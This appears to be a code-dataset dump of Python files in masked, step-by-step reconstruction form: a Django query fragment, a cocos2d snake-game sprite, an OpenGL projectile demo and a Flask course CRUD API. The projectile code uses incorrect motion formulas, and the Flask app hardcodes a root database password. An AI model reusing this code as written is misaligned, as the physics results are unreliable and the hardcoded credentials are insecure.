Employee.objects.values('dept').annotate(avg_age=Avg('age')).values_list('dept','avg_age')\n print(ret) # <QuerySet [('财务部', 27.5), ('技术部', 300.0), ('人事部', 45.0), ('管理部', 45.0)]>\n\n # # 求每个班级的学生的数量\n ret = Student.objects.values('myclass').annotate(s_count=Count('id'))\n print(ret) # <QuerySet [{'myclass': 1, 's_count': 1}, {'myclass': 2, 's_count': 3}, {'myclass': 3, 's_count': 2}, {'myclass': 4, 's_count': 1}, {'myclass': 5, 's_count': 1}, {'myclass': 6, 's_count': 1}, {'myclass': 7, 's_count': 1}]>\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
class Dot(Sprite):
<|reserved_special_token_0|>
def update(self, dt):
arena = self.parent.parent
snake = arena.snake
self.check_kill(snake)
for s in arena.enemies:
self.check_kill(s)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Dot(Sprite):
def __init__(self, pos=None, color=None):
if color is None:
color = random.choice(define.ALL_COLOR)
super(Dot, self).__init__('circle.png', color=color)
self.killed = False
if pos is None:
self.position = random.randint(40, define.WIDTH - 40
), random.randint(40, define.HEIGHT - 40)
self.is_big = False
self.scale = 0.8
else:
self.position = pos[0] + random.random() * 32 - 16, pos[1
] + random.random() * 32 - 16
self.is_big = True
self.schedule_interval(self.update, random.random() * 0.2 + 0.1)
def update(self, dt):
arena = self.parent.parent
snake = arena.snake
self.check_kill(snake)
for s in arena.enemies:
self.check_kill(s)
def check_kill(self, snake):
if (not self.killed and not snake.is_dead) and (abs(snake.x - self.
x) < 32 and abs(snake.y - self.y) < 32):
self.killed = True
self.killer = snake
self.do(MoveTo(snake.position, 0.1) + CallFuncS(kill))
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def kill(spr):
spr.unschedule(spr.update)
arena = spr.parent.parent
if not spr.is_big:
arena.batch.add(Dot())
spr.killer.add_score()
else:
spr.killer.add_score(2)
arena.batch.remove(spr)
if not spr.killer.is_enemy:
arena.parent.update_score()
del spr
class Dot(Sprite):
def __init__(self, pos=None, color=None):
if color is None:
color = random.choice(define.ALL_COLOR)
super(Dot, self).__init__('circle.png', color=color)
self.killed = False
if pos is None:
self.position = random.randint(40, define.WIDTH - 40
), random.randint(40, define.HEIGHT - 40)
self.is_big = False
self.scale = 0.8
else:
self.position = pos[0] + random.random() * 32 - 16, pos[1
] + random.random() * 32 - 16
self.is_big = True
self.schedule_interval(self.update, random.random() * 0.2 + 0.1)
def update(self, dt):
arena = self.parent.parent
snake = arena.snake
self.check_kill(snake)
for s in arena.enemies:
self.check_kill(s)
def check_kill(self, snake):
if (not self.killed and not snake.is_dead) and (abs(snake.x - self.
x) < 32 and abs(snake.y - self.y) < 32):
self.killed = True
self.killer = snake
self.do(MoveTo(snake.position, 0.1) + CallFuncS(kill))
<|reserved_special_token_1|>
import random
from cocos.actions import MoveTo, CallFuncS
from cocos.sprite import Sprite
import define
def kill(spr):
spr.unschedule(spr.update)
arena = spr.parent.parent
if not spr.is_big:
arena.batch.add(Dot())
spr.killer.add_score()
else:
spr.killer.add_score(2)
arena.batch.remove(spr)
if not spr.killer.is_enemy:
arena.parent.update_score()
del spr
class Dot(Sprite):
def __init__(self, pos=None, color=None):
if color is None:
color = random.choice(define.ALL_COLOR)
super(Dot, self).__init__('circle.png', color=color)
self.killed = False
if pos is None:
self.position = random.randint(40, define.WIDTH - 40
), random.randint(40, define.HEIGHT - 40)
self.is_big = False
self.scale = 0.8
else:
self.position = pos[0] + random.random() * 32 - 16, pos[1
] + random.random() * 32 - 16
self.is_big = True
self.schedule_interval(self.update, random.random() * 0.2 + 0.1)
def update(self, dt):
arena = self.parent.parent
snake = arena.snake
self.check_kill(snake)
for s in arena.enemies:
self.check_kill(s)
def check_kill(self, snake):
if (not self.killed and not snake.is_dead) and (abs(snake.x - self.
x) < 32 and abs(snake.y - self.y) < 32):
self.killed = True
self.killer = snake
self.do(MoveTo(snake.position, 0.1) + CallFuncS(kill))
<|reserved_special_token_1|>
# -*- coding: utf-8 -*-
import random
from cocos.actions import MoveTo, CallFuncS
from cocos.sprite import Sprite
import define
def kill(spr):
spr.unschedule(spr.update)
arena = spr.parent.parent
if not spr.is_big:
arena.batch.add(Dot())
spr.killer.add_score()
else:
spr.killer.add_score(2)
arena.batch.remove(spr)
if not spr.killer.is_enemy:
arena.parent.update_score()
del spr
class Dot(Sprite):
def __init__(self, pos=None, color=None):
if color is None:
color = random.choice(define.ALL_COLOR)
super(Dot, self).__init__('circle.png', color=color)
self.killed = False
if pos is None:
self.position = (random.randint(40, define.WIDTH - 40),
random.randint(40, define.HEIGHT - 40))
self.is_big = False
self.scale = 0.8
else:
self.position = (pos[0] + random.random() * 32 - 16,
pos[1] + random.random() * 32 - 16)
self.is_big = True
self.schedule_interval(self.update, random.random() * 0.2 + 0.1)
def update(self, dt):
arena = self.parent.parent
snake = arena.snake
self.check_kill(snake)
for s in arena.enemies:
self.check_kill(s)
def check_kill(self, snake):
if (not self.killed and not snake.is_dead) and (
abs(snake.x - self.x) < 32 and abs(snake.y - self.y) < 32
):
self.killed = True
self.killer = snake
self.do(MoveTo(snake.position, 0.1) + CallFuncS(kill))
|
flexible
|
{
"blob_id": "be06a0ad22f4ae9ab4c0acea6a7c601c14a90fc4",
"index": 1995,
"step-1": "<mask token>\n\n\nclass Dot(Sprite):\n <mask token>\n\n def update(self, dt):\n arena = self.parent.parent\n snake = arena.snake\n self.check_kill(snake)\n for s in arena.enemies:\n self.check_kill(s)\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass Dot(Sprite):\n\n def __init__(self, pos=None, color=None):\n if color is None:\n color = random.choice(define.ALL_COLOR)\n super(Dot, self).__init__('circle.png', color=color)\n self.killed = False\n if pos is None:\n self.position = random.randint(40, define.WIDTH - 40\n ), random.randint(40, define.HEIGHT - 40)\n self.is_big = False\n self.scale = 0.8\n else:\n self.position = pos[0] + random.random() * 32 - 16, pos[1\n ] + random.random() * 32 - 16\n self.is_big = True\n self.schedule_interval(self.update, random.random() * 0.2 + 0.1)\n\n def update(self, dt):\n arena = self.parent.parent\n snake = arena.snake\n self.check_kill(snake)\n for s in arena.enemies:\n self.check_kill(s)\n\n def check_kill(self, snake):\n if (not self.killed and not snake.is_dead) and (abs(snake.x - self.\n x) < 32 and abs(snake.y - self.y) < 32):\n self.killed = True\n self.killer = snake\n self.do(MoveTo(snake.position, 0.1) + CallFuncS(kill))\n",
"step-3": "<mask token>\n\n\ndef kill(spr):\n spr.unschedule(spr.update)\n arena = spr.parent.parent\n if not spr.is_big:\n arena.batch.add(Dot())\n spr.killer.add_score()\n else:\n spr.killer.add_score(2)\n arena.batch.remove(spr)\n if not spr.killer.is_enemy:\n arena.parent.update_score()\n del spr\n\n\nclass Dot(Sprite):\n\n def __init__(self, pos=None, color=None):\n if color is None:\n color = random.choice(define.ALL_COLOR)\n super(Dot, self).__init__('circle.png', color=color)\n self.killed = False\n if pos is None:\n self.position = random.randint(40, define.WIDTH - 40\n ), random.randint(40, define.HEIGHT - 40)\n self.is_big = False\n self.scale = 0.8\n else:\n self.position = pos[0] + random.random() * 32 - 16, pos[1\n ] + random.random() * 32 - 16\n self.is_big = True\n self.schedule_interval(self.update, random.random() * 0.2 + 0.1)\n\n def update(self, dt):\n arena = self.parent.parent\n snake = arena.snake\n self.check_kill(snake)\n for s in arena.enemies:\n self.check_kill(s)\n\n def check_kill(self, snake):\n if (not self.killed and not snake.is_dead) and (abs(snake.x - self.\n x) < 32 and abs(snake.y - self.y) < 32):\n self.killed = True\n self.killer = snake\n self.do(MoveTo(snake.position, 0.1) + CallFuncS(kill))\n",
"step-4": "import random\nfrom cocos.actions import MoveTo, CallFuncS\nfrom cocos.sprite import Sprite\nimport define\n\n\ndef kill(spr):\n spr.unschedule(spr.update)\n arena = spr.parent.parent\n if not spr.is_big:\n arena.batch.add(Dot())\n spr.killer.add_score()\n else:\n spr.killer.add_score(2)\n arena.batch.remove(spr)\n if not spr.killer.is_enemy:\n arena.parent.update_score()\n del spr\n\n\nclass Dot(Sprite):\n\n def __init__(self, pos=None, color=None):\n if color is None:\n color = random.choice(define.ALL_COLOR)\n super(Dot, self).__init__('circle.png', color=color)\n self.killed = False\n if pos is None:\n self.position = random.randint(40, define.WIDTH - 40\n ), random.randint(40, define.HEIGHT - 40)\n self.is_big = False\n self.scale = 0.8\n else:\n self.position = pos[0] + random.random() * 32 - 16, pos[1\n ] + random.random() * 32 - 16\n self.is_big = True\n self.schedule_interval(self.update, random.random() * 0.2 + 0.1)\n\n def update(self, dt):\n arena = self.parent.parent\n snake = arena.snake\n self.check_kill(snake)\n for s in arena.enemies:\n self.check_kill(s)\n\n def check_kill(self, snake):\n if (not self.killed and not snake.is_dead) and (abs(snake.x - self.\n x) < 32 and abs(snake.y - self.y) < 32):\n self.killed = True\n self.killer = snake\n self.do(MoveTo(snake.position, 0.1) + CallFuncS(kill))\n",
"step-5": "# -*- coding: utf-8 -*-\nimport random\nfrom cocos.actions import MoveTo, CallFuncS\nfrom cocos.sprite import Sprite\n\nimport define\n\n\ndef kill(spr):\n spr.unschedule(spr.update)\n arena = spr.parent.parent\n if not spr.is_big:\n arena.batch.add(Dot())\n spr.killer.add_score()\n else:\n spr.killer.add_score(2)\n arena.batch.remove(spr)\n if not spr.killer.is_enemy:\n arena.parent.update_score()\n del spr\n\nclass Dot(Sprite):\n def __init__(self, pos=None, color=None):\n if color is None:\n color = random.choice(define.ALL_COLOR)\n\n super(Dot, self).__init__('circle.png', color=color)\n self.killed = False\n if pos is None:\n self.position = (random.randint(40, define.WIDTH - 40),\n random.randint(40, define.HEIGHT - 40))\n self.is_big = False\n self.scale = 0.8\n else:\n self.position = (pos[0] + random.random() * 32 - 16,\n pos[1] + random.random() * 32 - 16)\n self.is_big = True\n self.schedule_interval(self.update, random.random() * 0.2 + 0.1)\n\n def update(self, dt):\n arena = self.parent.parent\n snake = arena.snake\n self.check_kill(snake)\n for s in arena.enemies:\n self.check_kill(s)\n\n def check_kill(self, snake):\n if (not self.killed and not snake.is_dead) and (\n abs(snake.x - self.x) < 32 and abs(snake.y - self.y) < 32\n ):\n self.killed = True\n self.killer = snake\n self.do(MoveTo(snake.position, 0.1) + CallFuncS(kill))\n",
"step-ids": [
2,
4,
5,
6,
7
]
}
|
[
2,
4,
5,
6,
7
] |
<|reserved_special_token_0|>
def init():
glClearColor(1.0, 1.0, 1.0, 1.0)
glClear(GL_COLOR_BUFFER_BIT)
glColor3f(1.0, 0.0, 0.0)
glPointSize(2)
gluOrtho2D(0.0, 500.0, 0.0, 500.0)
<|reserved_special_token_0|>
def mouse(btn, state, x, y):
global t_start
if btn == 0 and state == 1:
t_start = time.time()
kick(50, 50, 45, 20)
def kick(x, y, theta, u):
theta *= np.pi / 180
tot_time = 2 * u * np.sin(theta) / g
print(tot_time)
t0 = time.time()
t = 0
while t < tot_time:
t = time.time() - t0
x_inc = u * np.cos(theta) + t + x
y_inc = u * np.sin(theta) - g * t ** 2 + y
print(x_inc, y_inc)
poly(get_square_vertices(x_inc, y_inc))
time.sleep(0.1)
def main():
glutInit(sys.argv)
glutInitDisplayMode(GLUT_SINGLE | GLUT_RGB)
glutInitWindowSize(500, 500)
glutInitWindowPosition(0, 0)
glutCreateWindow(b'Projectile Motion')
init()
glutDisplayFunc(disp)
glutMouseFunc(mouse)
glutMainLoop()
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def init():
glClearColor(1.0, 1.0, 1.0, 1.0)
glClear(GL_COLOR_BUFFER_BIT)
glColor3f(1.0, 0.0, 0.0)
glPointSize(2)
gluOrtho2D(0.0, 500.0, 0.0, 500.0)
def disp():
draw_circle(50, 50, 10)
def mouse(btn, state, x, y):
global t_start
if btn == 0 and state == 1:
t_start = time.time()
kick(50, 50, 45, 20)
def kick(x, y, theta, u):
theta *= np.pi / 180
tot_time = 2 * u * np.sin(theta) / g
print(tot_time)
t0 = time.time()
t = 0
while t < tot_time:
t = time.time() - t0
x_inc = u * np.cos(theta) + t + x
y_inc = u * np.sin(theta) - g * t ** 2 + y
print(x_inc, y_inc)
poly(get_square_vertices(x_inc, y_inc))
time.sleep(0.1)
def main():
glutInit(sys.argv)
glutInitDisplayMode(GLUT_SINGLE | GLUT_RGB)
glutInitWindowSize(500, 500)
glutInitWindowPosition(0, 0)
glutCreateWindow(b'Projectile Motion')
init()
glutDisplayFunc(disp)
glutMouseFunc(mouse)
glutMainLoop()
main()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
g = 9.8
t_start = 0
def init():
glClearColor(1.0, 1.0, 1.0, 1.0)
glClear(GL_COLOR_BUFFER_BIT)
glColor3f(1.0, 0.0, 0.0)
glPointSize(2)
gluOrtho2D(0.0, 500.0, 0.0, 500.0)
def disp():
draw_circle(50, 50, 10)
def mouse(btn, state, x, y):
global t_start
if btn == 0 and state == 1:
t_start = time.time()
kick(50, 50, 45, 20)
def kick(x, y, theta, u):
theta *= np.pi / 180
tot_time = 2 * u * np.sin(theta) / g
print(tot_time)
t0 = time.time()
t = 0
while t < tot_time:
t = time.time() - t0
x_inc = u * np.cos(theta) + t + x
y_inc = u * np.sin(theta) - g * t ** 2 + y
print(x_inc, y_inc)
poly(get_square_vertices(x_inc, y_inc))
time.sleep(0.1)
def main():
glutInit(sys.argv)
glutInitDisplayMode(GLUT_SINGLE | GLUT_RGB)
glutInitWindowSize(500, 500)
glutInitWindowPosition(0, 0)
glutCreateWindow(b'Projectile Motion')
init()
glutDisplayFunc(disp)
glutMouseFunc(mouse)
glutMainLoop()
main()
<|reserved_special_token_1|>
import time
import numpy as np
from OpenGL.GLUT import *
from OpenGL.GLU import *
from OpenGL.GL import *
from utils import *
g = 9.8
t_start = 0
def init():
glClearColor(1.0, 1.0, 1.0, 1.0)
glClear(GL_COLOR_BUFFER_BIT)
glColor3f(1.0, 0.0, 0.0)
glPointSize(2)
gluOrtho2D(0.0, 500.0, 0.0, 500.0)
def disp():
draw_circle(50, 50, 10)
def mouse(btn, state, x, y):
global t_start
if btn == 0 and state == 1:
t_start = time.time()
kick(50, 50, 45, 20)
def kick(x, y, theta, u):
theta *= np.pi / 180
tot_time = 2 * u * np.sin(theta) / g
print(tot_time)
t0 = time.time()
t = 0
while t < tot_time:
t = time.time() - t0
x_inc = u * np.cos(theta) + t + x
y_inc = u * np.sin(theta) - g * t ** 2 + y
print(x_inc, y_inc)
poly(get_square_vertices(x_inc, y_inc))
time.sleep(0.1)
def main():
glutInit(sys.argv)
glutInitDisplayMode(GLUT_SINGLE | GLUT_RGB)
glutInitWindowSize(500, 500)
glutInitWindowPosition(0, 0)
glutCreateWindow(b'Projectile Motion')
init()
glutDisplayFunc(disp)
glutMouseFunc(mouse)
glutMainLoop()
main()
<|reserved_special_token_1|>
import time
import numpy as np
from OpenGL.GLUT import *
from OpenGL.GLU import *
from OpenGL.GL import *
from utils import *
g = 9.8
t_start = 0
def init():
glClearColor(1.0, 1.0, 1.0, 1.0)
glClear(GL_COLOR_BUFFER_BIT)
glColor3f(1.0, 0.0, 0.0)
glPointSize(2)
gluOrtho2D(0.0, 500.0, 0.0, 500.0)
def disp():
draw_circle(50, 50, 10)
def mouse(btn, state, x, y):
global t_start
if btn == 0 and state == 1:
t_start = time.time()
kick(50, 50, 45, 20)
def kick(x, y, theta, u):
theta *= np.pi/180
tot_time = 2 * u * np.sin(theta) / g
print(tot_time)
t0 = time.time()
t = 0
while t < tot_time:
t = time.time() - t0
x_inc = u * np.cos(theta) + t + x
y_inc = u * np.sin((theta)) - g * t ** 2 + y
print(x_inc, y_inc)
poly(get_square_vertices(x_inc, y_inc))
time.sleep(0.1)
def main():
glutInit(sys.argv)
glutInitDisplayMode(GLUT_SINGLE | GLUT_RGB)
glutInitWindowSize(500, 500)
glutInitWindowPosition(0, 0)
glutCreateWindow(b'Projectile Motion')
init()
glutDisplayFunc(disp)
glutMouseFunc(mouse)
glutMainLoop()
main()
|
flexible
|
{
"blob_id": "d85c0929b22f57367c0e707bac78e56027113417",
"index": 4539,
"step-1": "<mask token>\n\n\ndef init():\n glClearColor(1.0, 1.0, 1.0, 1.0)\n glClear(GL_COLOR_BUFFER_BIT)\n glColor3f(1.0, 0.0, 0.0)\n glPointSize(2)\n gluOrtho2D(0.0, 500.0, 0.0, 500.0)\n\n\n<mask token>\n\n\ndef mouse(btn, state, x, y):\n global t_start\n if btn == 0 and state == 1:\n t_start = time.time()\n kick(50, 50, 45, 20)\n\n\ndef kick(x, y, theta, u):\n theta *= np.pi / 180\n tot_time = 2 * u * np.sin(theta) / g\n print(tot_time)\n t0 = time.time()\n t = 0\n while t < tot_time:\n t = time.time() - t0\n x_inc = u * np.cos(theta) + t + x\n y_inc = u * np.sin(theta) - g * t ** 2 + y\n print(x_inc, y_inc)\n poly(get_square_vertices(x_inc, y_inc))\n time.sleep(0.1)\n\n\ndef main():\n glutInit(sys.argv)\n glutInitDisplayMode(GLUT_SINGLE | GLUT_RGB)\n glutInitWindowSize(500, 500)\n glutInitWindowPosition(0, 0)\n glutCreateWindow(b'Projectile Motion')\n init()\n glutDisplayFunc(disp)\n glutMouseFunc(mouse)\n glutMainLoop()\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef init():\n glClearColor(1.0, 1.0, 1.0, 1.0)\n glClear(GL_COLOR_BUFFER_BIT)\n glColor3f(1.0, 0.0, 0.0)\n glPointSize(2)\n gluOrtho2D(0.0, 500.0, 0.0, 500.0)\n\n\ndef disp():\n draw_circle(50, 50, 10)\n\n\ndef mouse(btn, state, x, y):\n global t_start\n if btn == 0 and state == 1:\n t_start = time.time()\n kick(50, 50, 45, 20)\n\n\ndef kick(x, y, theta, u):\n theta *= np.pi / 180\n tot_time = 2 * u * np.sin(theta) / g\n print(tot_time)\n t0 = time.time()\n t = 0\n while t < tot_time:\n t = time.time() - t0\n x_inc = u * np.cos(theta) + t + x\n y_inc = u * np.sin(theta) - g * t ** 2 + y\n print(x_inc, y_inc)\n poly(get_square_vertices(x_inc, y_inc))\n time.sleep(0.1)\n\n\ndef main():\n glutInit(sys.argv)\n glutInitDisplayMode(GLUT_SINGLE | GLUT_RGB)\n glutInitWindowSize(500, 500)\n glutInitWindowPosition(0, 0)\n glutCreateWindow(b'Projectile Motion')\n init()\n glutDisplayFunc(disp)\n glutMouseFunc(mouse)\n glutMainLoop()\n\n\nmain()\n",
"step-3": "<mask token>\ng = 9.8\nt_start = 0\n\n\ndef init():\n glClearColor(1.0, 1.0, 1.0, 1.0)\n glClear(GL_COLOR_BUFFER_BIT)\n glColor3f(1.0, 0.0, 0.0)\n glPointSize(2)\n gluOrtho2D(0.0, 500.0, 0.0, 500.0)\n\n\ndef disp():\n draw_circle(50, 50, 10)\n\n\ndef mouse(btn, state, x, y):\n global t_start\n if btn == 0 and state == 1:\n t_start = time.time()\n kick(50, 50, 45, 20)\n\n\ndef kick(x, y, theta, u):\n theta *= np.pi / 180\n tot_time = 2 * u * np.sin(theta) / g\n print(tot_time)\n t0 = time.time()\n t = 0\n while t < tot_time:\n t = time.time() - t0\n x_inc = u * np.cos(theta) + t + x\n y_inc = u * np.sin(theta) - g * t ** 2 + y\n print(x_inc, y_inc)\n poly(get_square_vertices(x_inc, y_inc))\n time.sleep(0.1)\n\n\ndef main():\n glutInit(sys.argv)\n glutInitDisplayMode(GLUT_SINGLE | GLUT_RGB)\n glutInitWindowSize(500, 500)\n glutInitWindowPosition(0, 0)\n glutCreateWindow(b'Projectile Motion')\n init()\n glutDisplayFunc(disp)\n glutMouseFunc(mouse)\n glutMainLoop()\n\n\nmain()\n",
"step-4": "import time\nimport numpy as np\nfrom OpenGL.GLUT import *\nfrom OpenGL.GLU import *\nfrom OpenGL.GL import *\nfrom utils import *\ng = 9.8\nt_start = 0\n\n\ndef init():\n glClearColor(1.0, 1.0, 1.0, 1.0)\n glClear(GL_COLOR_BUFFER_BIT)\n glColor3f(1.0, 0.0, 0.0)\n glPointSize(2)\n gluOrtho2D(0.0, 500.0, 0.0, 500.0)\n\n\ndef disp():\n draw_circle(50, 50, 10)\n\n\ndef mouse(btn, state, x, y):\n global t_start\n if btn == 0 and state == 1:\n t_start = time.time()\n kick(50, 50, 45, 20)\n\n\ndef kick(x, y, theta, u):\n theta *= np.pi / 180\n tot_time = 2 * u * np.sin(theta) / g\n print(tot_time)\n t0 = time.time()\n t = 0\n while t < tot_time:\n t = time.time() - t0\n x_inc = u * np.cos(theta) + t + x\n y_inc = u * np.sin(theta) - g * t ** 2 + y\n print(x_inc, y_inc)\n poly(get_square_vertices(x_inc, y_inc))\n time.sleep(0.1)\n\n\ndef main():\n glutInit(sys.argv)\n glutInitDisplayMode(GLUT_SINGLE | GLUT_RGB)\n glutInitWindowSize(500, 500)\n glutInitWindowPosition(0, 0)\n glutCreateWindow(b'Projectile Motion')\n init()\n glutDisplayFunc(disp)\n glutMouseFunc(mouse)\n glutMainLoop()\n\n\nmain()\n",
"step-5": "import time\n\nimport numpy as np\nfrom OpenGL.GLUT import *\nfrom OpenGL.GLU import *\nfrom OpenGL.GL import *\nfrom utils import *\n\ng = 9.8\nt_start = 0\n\n\ndef init():\n glClearColor(1.0, 1.0, 1.0, 1.0)\n glClear(GL_COLOR_BUFFER_BIT)\n glColor3f(1.0, 0.0, 0.0)\n glPointSize(2)\n gluOrtho2D(0.0, 500.0, 0.0, 500.0)\n\n\ndef disp():\n draw_circle(50, 50, 10)\n\n\ndef mouse(btn, state, x, y):\n global t_start\n if btn == 0 and state == 1:\n t_start = time.time()\n kick(50, 50, 45, 20)\n\n\ndef kick(x, y, theta, u):\n theta *= np.pi/180\n tot_time = 2 * u * np.sin(theta) / g\n print(tot_time)\n t0 = time.time()\n t = 0\n while t < tot_time:\n t = time.time() - t0\n x_inc = u * np.cos(theta) + t + x\n y_inc = u * np.sin((theta)) - g * t ** 2 + y\n print(x_inc, y_inc)\n poly(get_square_vertices(x_inc, y_inc))\n time.sleep(0.1)\n\n\n\ndef main():\n glutInit(sys.argv)\n glutInitDisplayMode(GLUT_SINGLE | GLUT_RGB)\n glutInitWindowSize(500, 500)\n glutInitWindowPosition(0, 0)\n glutCreateWindow(b'Projectile Motion')\n init()\n glutDisplayFunc(disp)\n glutMouseFunc(mouse)\n glutMainLoop()\n\n\nmain()\n",
"step-ids": [
4,
6,
7,
8,
9
]
}
|
[
4,
6,
7,
8,
9
] |
<|reserved_special_token_0|>
class curso(db.Model):
idcurso = db.Column(db.Integer, primary_key=True)
nombre_curso = db.Column(db.String(45))
precio = db.Column(db.Integer)
def __init__(self, nombre, precio):
self.nombre_curso = nombre
self.precio = precio
<|reserved_special_token_0|>
class CursoSchema(ma.Schema):
class Meta:
fields = 'idcurso', 'nombre_curso', 'precio'
<|reserved_special_token_0|>
@app.route('/', methods=['GET'])
def index():
return jsonify({'message': 'Academia'})
@app.route('/cursos', methods=['POST'])
def create_curso():
nombre_curso = request.json['nombre_curso']
precio = request.json['precio']
new_Curso = curso(nombre_curso, precio)
db.session.add(new_Curso)
db.session.commit()
return curso_Schema.jsonify(new_Curso)
@app.route('/cursos', methods=['GET'])
def get_cursos():
all_cursos = curso.query.all()
result = cursos_Schema.dump(all_cursos)
return jsonify(result)
@app.route('/cursos/<id>', methods=['GET'])
def get_task(id):
cursoGet = curso.query.get(id)
return curso_Schema.jsonify(cursoGet)
<|reserved_special_token_0|>
@app.route('/cursos/<id>', methods=['DELETE'])
def delete_item(id):
cursoDelete = curso.query.get(id)
db.session.delete(cursoDelete)
db.session.commit()
return curso_Schema.jsonify(cursoDelete)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class curso(db.Model):
idcurso = db.Column(db.Integer, primary_key=True)
nombre_curso = db.Column(db.String(45))
precio = db.Column(db.Integer)
def __init__(self, nombre, precio):
self.nombre_curso = nombre
self.precio = precio
<|reserved_special_token_0|>
class CursoSchema(ma.Schema):
class Meta:
fields = 'idcurso', 'nombre_curso', 'precio'
<|reserved_special_token_0|>
@app.route('/', methods=['GET'])
def index():
return jsonify({'message': 'Academia'})
@app.route('/cursos', methods=['POST'])
def create_curso():
nombre_curso = request.json['nombre_curso']
precio = request.json['precio']
new_Curso = curso(nombre_curso, precio)
db.session.add(new_Curso)
db.session.commit()
return curso_Schema.jsonify(new_Curso)
@app.route('/cursos', methods=['GET'])
def get_cursos():
all_cursos = curso.query.all()
result = cursos_Schema.dump(all_cursos)
return jsonify(result)
@app.route('/cursos/<id>', methods=['GET'])
def get_task(id):
cursoGet = curso.query.get(id)
return curso_Schema.jsonify(cursoGet)
@app.route('/cursos/<id>', methods=['PUT'])
def update_curso(id):
cursoUpdate = curso.query.get(id)
nombre = request.json['nombre_curso']
precio = request.json['precio']
cursoUpdate.nombre_curso = nombre
cursoUpdate.precio = precio
db.session.commit()
return curso_Schema.jsonify(cursoUpdate)
@app.route('/cursos/<id>', methods=['DELETE'])
def delete_item(id):
cursoDelete = curso.query.get(id)
db.session.delete(cursoDelete)
db.session.commit()
return curso_Schema.jsonify(cursoDelete)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class curso(db.Model):
idcurso = db.Column(db.Integer, primary_key=True)
nombre_curso = db.Column(db.String(45))
precio = db.Column(db.Integer)
def __init__(self, nombre, precio):
self.nombre_curso = nombre
self.precio = precio
db.create_all()
class CursoSchema(ma.Schema):
class Meta:
fields = 'idcurso', 'nombre_curso', 'precio'
<|reserved_special_token_0|>
@app.route('/', methods=['GET'])
def index():
return jsonify({'message': 'Academia'})
@app.route('/cursos', methods=['POST'])
def create_curso():
nombre_curso = request.json['nombre_curso']
precio = request.json['precio']
new_Curso = curso(nombre_curso, precio)
db.session.add(new_Curso)
db.session.commit()
return curso_Schema.jsonify(new_Curso)
@app.route('/cursos', methods=['GET'])
def get_cursos():
all_cursos = curso.query.all()
result = cursos_Schema.dump(all_cursos)
return jsonify(result)
@app.route('/cursos/<id>', methods=['GET'])
def get_task(id):
cursoGet = curso.query.get(id)
return curso_Schema.jsonify(cursoGet)
@app.route('/cursos/<id>', methods=['PUT'])
def update_curso(id):
cursoUpdate = curso.query.get(id)
nombre = request.json['nombre_curso']
precio = request.json['precio']
cursoUpdate.nombre_curso = nombre
cursoUpdate.precio = precio
db.session.commit()
return curso_Schema.jsonify(cursoUpdate)
@app.route('/cursos/<id>', methods=['DELETE'])
def delete_item(id):
cursoDelete = curso.query.get(id)
db.session.delete(cursoDelete)
db.session.commit()
return curso_Schema.jsonify(cursoDelete)
if __name__ == '__main__':
app.run(debug=True)
<|reserved_special_token_1|>
from flask import Flask, json, request, jsonify
from flask_sqlalchemy import SQLAlchemy
from flask_marshmallow import Marshmallow
import warnings
app = Flask(__name__)
app.config['SQLALCHEMY_DATABASE_URI'
] = 'mysql+pymysql://root:1234@localhost/escuela'
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
db = SQLAlchemy(app)
ma = Marshmallow(app)
class curso(db.Model):
idcurso = db.Column(db.Integer, primary_key=True)
nombre_curso = db.Column(db.String(45))
precio = db.Column(db.Integer)
def __init__(self, nombre, precio):
self.nombre_curso = nombre
self.precio = precio
db.create_all()
class CursoSchema(ma.Schema):
class Meta:
fields = 'idcurso', 'nombre_curso', 'precio'
curso_Schema = CursoSchema()
cursos_Schema = CursoSchema(many=True)
@app.route('/', methods=['GET'])
def index():
return jsonify({'message': 'Academia'})
@app.route('/cursos', methods=['POST'])
def create_curso():
nombre_curso = request.json['nombre_curso']
precio = request.json['precio']
new_Curso = curso(nombre_curso, precio)
db.session.add(new_Curso)
db.session.commit()
return curso_Schema.jsonify(new_Curso)
@app.route('/cursos', methods=['GET'])
def get_cursos():
all_cursos = curso.query.all()
result = cursos_Schema.dump(all_cursos)
return jsonify(result)
@app.route('/cursos/<id>', methods=['GET'])
def get_task(id):
cursoGet = curso.query.get(id)
return curso_Schema.jsonify(cursoGet)
@app.route('/cursos/<id>', methods=['PUT'])
def update_curso(id):
cursoUpdate = curso.query.get(id)
nombre = request.json['nombre_curso']
precio = request.json['precio']
cursoUpdate.nombre_curso = nombre
cursoUpdate.precio = precio
db.session.commit()
return curso_Schema.jsonify(cursoUpdate)
@app.route('/cursos/<id>', methods=['DELETE'])
def delete_item(id):
cursoDelete = curso.query.get(id)
db.session.delete(cursoDelete)
db.session.commit()
return curso_Schema.jsonify(cursoDelete)
if __name__ == '__main__':
app.run(debug=True)
<|reserved_special_token_1|>
from flask import Flask, json, request, jsonify
from flask_sqlalchemy import SQLAlchemy
from flask_marshmallow import Marshmallow
import warnings
app = Flask(__name__)
app.config['SQLALCHEMY_DATABASE_URI'] = 'mysql+pymysql://root:1234@localhost/escuela'
app.config['SQLALCHEMY_TRACK_MODIFICATIONS']=False
db = SQLAlchemy(app)
ma = Marshmallow(app)
class curso(db.Model):
idcurso = db.Column(db.Integer, primary_key=True)
nombre_curso = db.Column(db.String(45))
precio = db.Column(db.Integer)
def __init__(self, nombre, precio):
self.nombre_curso = nombre
self.precio = precio
db.create_all()
class CursoSchema(ma.Schema):
class Meta:
fields = ('idcurso','nombre_curso','precio')
curso_Schema = CursoSchema()
cursos_Schema = CursoSchema(many=True)
@app.route('/',methods=['GET'])
def index():
return jsonify({'message': 'Academia'})
@app.route('/cursos', methods=['POST'])
def create_curso():
nombre_curso = request.json['nombre_curso']
precio = request.json['precio']
new_Curso = curso(nombre_curso,precio)
db.session.add(new_Curso)
db.session.commit()
return curso_Schema.jsonify(new_Curso)
@app.route('/cursos',methods=['GET'])
def get_cursos():
all_cursos = curso.query.all()
result =cursos_Schema.dump(all_cursos)
return jsonify(result)
